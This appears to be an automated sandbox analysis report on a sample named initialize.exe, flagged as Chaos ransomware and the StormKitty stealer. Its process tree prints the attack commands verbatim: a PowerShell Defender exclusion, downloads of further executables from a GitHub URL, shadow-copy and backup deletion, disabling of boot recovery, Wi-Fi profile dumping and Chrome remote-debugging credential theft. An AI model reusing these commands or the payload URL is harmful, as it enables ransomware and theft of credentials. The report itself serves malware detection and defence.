Analysis

  • max time kernel
    105s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2025, 23:16

General

  • Target

    initialize.exe

  • Size

    57KB

  • MD5

    f40b4d5dc143233298f0a5e78dd68a0f

  • SHA1

    87d23f60239c692e96ce5375ada123bbc3ebccc0

  • SHA256

    9e13904bbfb3b36110a58fc9f339fc82957e5c938c79bd87d9bcbbf04dcd65f7

  • SHA512

    0b8ab10ea18812a688b940946ddeeb9de83889a53a27efc6906c22735e72bcf98df6350e460f6090f043360b96b8349b9337ab3c9510a6f5b6fae2d0e1726f4b

  • SSDEEP

    1536:6rPJVKjbcknWSOYvTfkWkFM79yQVuuSCRc:6LJMjbcHDdMwQ7

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Uses browser remote debugging 2 TTPs 5 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\initialize.exe
    "C:\Users\Admin\AppData\Local\Temp\initialize.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4040
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A42F.tmp\A430.tmp\A431.bat C:\Users\Admin\AppData\Local\Temp\initialize.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2732
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1248
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:5604
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4872
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1976
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3304
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:664
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:728
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
                PID:4544
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:5536
                • C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled no
                  6⤵
                  • Modifies boot configuration data using bcdedit
                  PID:5208
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                5⤵
                  PID:3932
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    6⤵
                    • Deletes backup catalog
                    PID:1492
                • C:\Windows\system32\NOTEPAD.EXE
                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
                  5⤵
                  • Opens file in notepad (likely ransom note)
                  PID:5572
            • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
              "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
              3⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • outlook_office_path
              • outlook_win_path
              PID:4476
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                4⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Wi-Fi Discovery
                • Suspicious use of WriteProcessMemory
                PID:3732
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3296
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show profile
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:5308
                • C:\Windows\SysWOW64\findstr.exe
                  findstr All
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1032
              • C:\Windows\SysWOW64\cmd.exe
                "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3792
                • C:\Windows\SysWOW64\chcp.com
                  chcp 65001
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2264
                • C:\Windows\SysWOW64\netsh.exe
                  netsh wlan show networks mode=bssid
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:32
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                4⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xc0,0x104,0x7ff80ac3dcf8,0x7ff80ac3dd04,0x7ff80ac3dd10
                  5⤵
                    PID:1396
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1960,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1956 /prefetch:2
                    5⤵
                      PID:4568
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1588,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2296 /prefetch:3
                      5⤵
                        PID:4244
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2384,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2396 /prefetch:8
                        5⤵
                          PID:2152
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3260,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:3768
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3304 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:4068
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4360,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4388 /prefetch:2
                          5⤵
                          • Uses browser remote debugging
                          PID:3776
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,13794551250753175559,7110254823228628208,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4788 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:5300
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
                      3⤵
                      • Hide Artifacts: Ignore Process Interrupts
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3776
                • C:\Windows\system32\vssvc.exe
                  C:\Windows\system32\vssvc.exe
                  1⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:968
                • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                  "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                  1⤵
                    PID:5068
                  • C:\Windows\system32\wbengine.exe
                    "C:\Windows\system32\wbengine.exe"
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2420
                  • C:\Windows\System32\vdsldr.exe
                    C:\Windows\System32\vdsldr.exe -Embedding
                    1⤵
                      PID:2876
                    • C:\Windows\System32\vds.exe
                      C:\Windows\System32\vds.exe
                      1⤵
                      • Checks SCSI registry key(s)
                      PID:5268

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

                      Filesize

                      1B

                      MD5

                      d1457b72c3fb323a2671125aef3eab5d

                      SHA1

                      5bab61eb53176449e25c2c82f172b82cb13ffb9d

                      SHA256

                      8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

                      SHA512

                      ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                      Filesize

                      40B

                      MD5

                      e583b3bcd0a283734268ceaab094ecf6

                      SHA1

                      31cd245bfde1e6f488730f052d6d37bbcfe470ea

                      SHA256

                      a143092cbf17b2e36e7b5e9ec5058a2154cca9ac0c2b5841855c07439ae6c509

                      SHA512

                      3168641a34bfeed7098fe87c75ab92337c94baf76d8725e295a411853381514748e71a0c4c527893a653e1a30d0cf1b540ede8ba480ca655af78cbec0b259e21

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                      Filesize

                      2B

                      MD5

                      d751713988987e9331980363e24189ce

                      SHA1

                      97d170e1550eee4afc0af065b78cda302a97674c

                      SHA256

                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                      SHA512

                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

                      Filesize

                      2KB

                      MD5

                      230bf39b827497233f42c6abea62b14f

                      SHA1

                      640f607a017445ab3c436e94f3be3c53ba385f5f

                      SHA256

                      a1e6dd30e8692a89710eef8b860a0bb2e7f828824af9754005fa5e36edfeed92

                      SHA512

                      01804dd0cea3ffea13684eaf4007fc6e6fa7868f1b74f27a5a9e37d867e0b1a6c43e6665f7aa6a1ec3bb01a2920950574301a0a69b671bb6b743d075fffe729b

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

                      Filesize

                      289B

                      MD5

                      541c42f1c98b3e1b011d22eba854e707

                      SHA1

                      db30188de1f22e3077e7044be1386a5d0ecaed9d

                      SHA256

                      0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b

                      SHA512

                      47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

                      Filesize

                      17KB

                      MD5

                      c5d21a3a91fe4536746e4dbfdda1fcbe

                      SHA1

                      e0b04b2b18bb010790ce19ba67c8c4eb89a8ebc5

                      SHA256

                      3203eb22946f8c2016b2de8065d86cf3cdd8bc9295402cd9a6d07d896b91d266

                      SHA512

                      da86a48215cf412aa3056e2d8104b6eb719e038a0a6535efe381956e7fb1a269b912f1668a653f7616e00635680c7daa231ff4a9ce9ac25dc29f447b87d16891

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

                      Filesize

                      1KB

                      MD5

                      53e63cf0383d7be1c7a33fd228587e96

                      SHA1

                      1a75c989434b0e1b868d7e08be818251d85db99a

                      SHA256

                      4631974c865593e63613e8c750a89c1cf7c9a66ce42a2e89a7e0b2b7e3a24357

                      SHA512

                      8b1999887eb4c1797614733b9089490aec19c4383b1c322842e327695daedb7d92fd4aa8239960521c2d7d998ff85c14cbcdbebd1c9b855167b245439362249d

                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                      Filesize

                      80KB

                      MD5

                      2d9cd3e9120441afe80b019a3c69237d

                      SHA1

                      3eb70fd262088a72a8a4e6a2339f57ca59f6d819

                      SHA256

                      b3d0bdfeab0a5d476c14e959617a79cd5f19c52b80be37035a448045a57475f4

                      SHA512

                      592e47b0f5d954eefff66038482f9dccbc21de4629f6718f951c60333a16a33af48c8b93dc6c7870053f1031c699015f5feb0b4f97d8d2e5f77d3b5bbeb58c29

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

                      Filesize

                      226B

                      MD5

                      28d7fcc2b910da5e67ebb99451a5f598

                      SHA1

                      a5bf77a53eda1208f4f37d09d82da0b9915a6747

                      SHA256

                      2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

                      SHA512

                      2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      944B

                      MD5

                      8a91d09aaa62ddaa8415a561b0ae9a53

                      SHA1

                      0cbdb17f2fca0a8a8cdea048c6ce6de20a35421a

                      SHA256

                      51bdbce7d793fa8e5af28c49fd76307ce771e19157c2bb966d9587a2710a7d4f

                      SHA512

                      fbdfbe07942d00afe8d9e970eacdf55b224a3cb326a2e07c6d6e6abe6160452ee69da4a10b734eb018e46a99fa88cc31099928a727183fa12e9e1135fadc3ce3

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      de7ad107a340ccd08f9c578ec34fa483

                      SHA1

                      9e5b7b07569bbbf4e761e1e2510504d509abfa78

                      SHA256

                      c931445f72dcfecf43787462225f0d8228c6a401ba05b4fd4b1b024c2ea67eed

                      SHA512

                      6828805777759a51967f55059bc4a8fe731908ee80e6664a99a275b8357cb703a8bc022155648fe507f83852b0279041a87d5c3800a4cf6bceda2a458163e27a

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      3df110e480ee96b0eb33e2a49b6e9c38

                      SHA1

                      ab63f7e1cae2e3c353480cf9649ed003f297f02c

                      SHA256

                      6e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c

                      SHA512

                      37287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

                      Filesize

                      429KB

                      MD5

                      015bed349e80611ca4496ba6f063e3d3

                      SHA1

                      a8f5256e4779aa175ebdbb3b5e6cd91be708ba78

                      SHA256

                      448fba4ea98455dcea8633704fab1fafb5b308949e13e4f66ab61c6c52be5cb1

                      SHA512

                      691f4d493f2e244f0f73e7d4fb11e568b0fdf73eb5963023b3694913d5bd9a5dc6c82b401b30ebcbf22c168e59bec530c9109f6b2349d170dc2e3fdb69887666

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeAutoFill.txt

                      Filesize

                      23B

                      MD5

                      f19d961388cd1c4572942a4f1397d15d

                      SHA1

                      95a89992f4fe50c0a6f4351c3f93c14487087844

                      SHA256

                      052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d

                      SHA512

                      66a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeBookmarks.txt

                      Filesize

                      19B

                      MD5

                      c5b94f01b5b97e31f9cec28fecefe0b1

                      SHA1

                      5a2f650235d6319696f02a10a0393b47dbddcd81

                      SHA256

                      bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548

                      SHA512

                      8e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeCookies.txt

                      Filesize

                      17B

                      MD5

                      964d5571d9a4fec576fe454162f2e844

                      SHA1

                      6234d1102a5012094dc8818bc045f7890d270905

                      SHA256

                      6cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995

                      SHA512

                      402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

                      Filesize

                      17B

                      MD5

                      b80546283f231ee762dee4b33b0aa091

                      SHA1

                      ec5a0f5581d8d9e9784f82b77e4e0eb187d78301

                      SHA256

                      188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8

                      SHA512

                      df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

                      Filesize

                      19B

                      MD5

                      c4efd9a7b61ebf43b608440be5e33369

                      SHA1

                      926418256c277f1b11b575ec6e92ce6a844612f7

                      SHA256

                      ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f

                      SHA512

                      9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

                      Filesize

                      81B

                      MD5

                      ea511fc534efd031f852fcf490b76104

                      SHA1

                      573e5fa397bc953df5422abbeb1a52bf94f7cf00

                      SHA256

                      e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

                      SHA512

                      f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\DesktopScreenshot.png

                      Filesize

                      427KB

                      MD5

                      458ac587e9f2274c5475de8aa25a741d

                      SHA1

                      3019f6c97e4c0c16f2591c640cad2bc17727828b

                      SHA256

                      6b0370a8ee30f6e0aa1b533e10d0685775467a187b01f5d779f25db2322f2d3d

                      SHA512

                      8cc07edeea7263c9f04bf3cb918ddf5385ef1019f2a6d5427bb427c2c4c28283ffc66a06af836440509d5b5e9e6cc4580e25ae7293e926ae5117dc54f7cb4eef

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

                      Filesize

                      355B

                      MD5

                      cfb422c58b4f2e277cae6b03d3077b54

                      SHA1

                      65b2114763418576f5bc74d5a516f26dd18f56dd

                      SHA256

                      bc39ccc7741240d8149e07a845b872b770ab585402704bedf1ca882da67a4c64

                      SHA512

                      7691c87ffb043e4d309a9d987a8f0b7c04a1b3a6bc79ec2979da9211ad1f54b66c1d836200ff0962b0ac9f32e81894e4037610a3f615257d72d623d8e311674b

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                      Filesize

                      4KB

                      MD5

                      cfedaf10c3f4864d6668dd8bea705739

                      SHA1

                      d889b0e6115b1037dc86915f9410d8e8f2d2fd45

                      SHA256

                      51cacea53f7ef78cc033f8da6845996fb731ef03541a12816a418ebb7b3c7d83

                      SHA512

                      4fe767d0467b00cc6c05de3941fd588bf68368ddd7ef087f724d0eff4897795e0f76588ae2065d2fc83e7456e92a2a3907945ab24904b630e4c7e1709665c598

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

                      Filesize

                      5KB

                      MD5

                      53ba56079f3687a6a0f8ec52550c0d1b

                      SHA1

                      b23c4d7e9d8455fc8138b7d4b87462745c92e741

                      SHA256

                      00555b5cef66f3e244bfb5547628e1c5088500a2f151f1935c20ace773c4effc

                      SHA512

                      b485300cf65c7b83bede8a1594263fc38417a91bd82ec45ed625ed985ced63cd48ba0deb6730008382e5dc535a24eecfea9a4908c6d91fd6430f5e7319c814bf

                    • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Windows.txt

                      Filesize

                      73B

                      MD5

                      8ce1202fa74972edfd3f333b6b2e1a12

                      SHA1

                      dd60a15c4de30253f736d3c287900db6682deeb9

                      SHA256

                      9afabd3d8dbeffe465003c6f37e2fad20d2f754be07fed7eac7c7eba59e3a634

                      SHA512

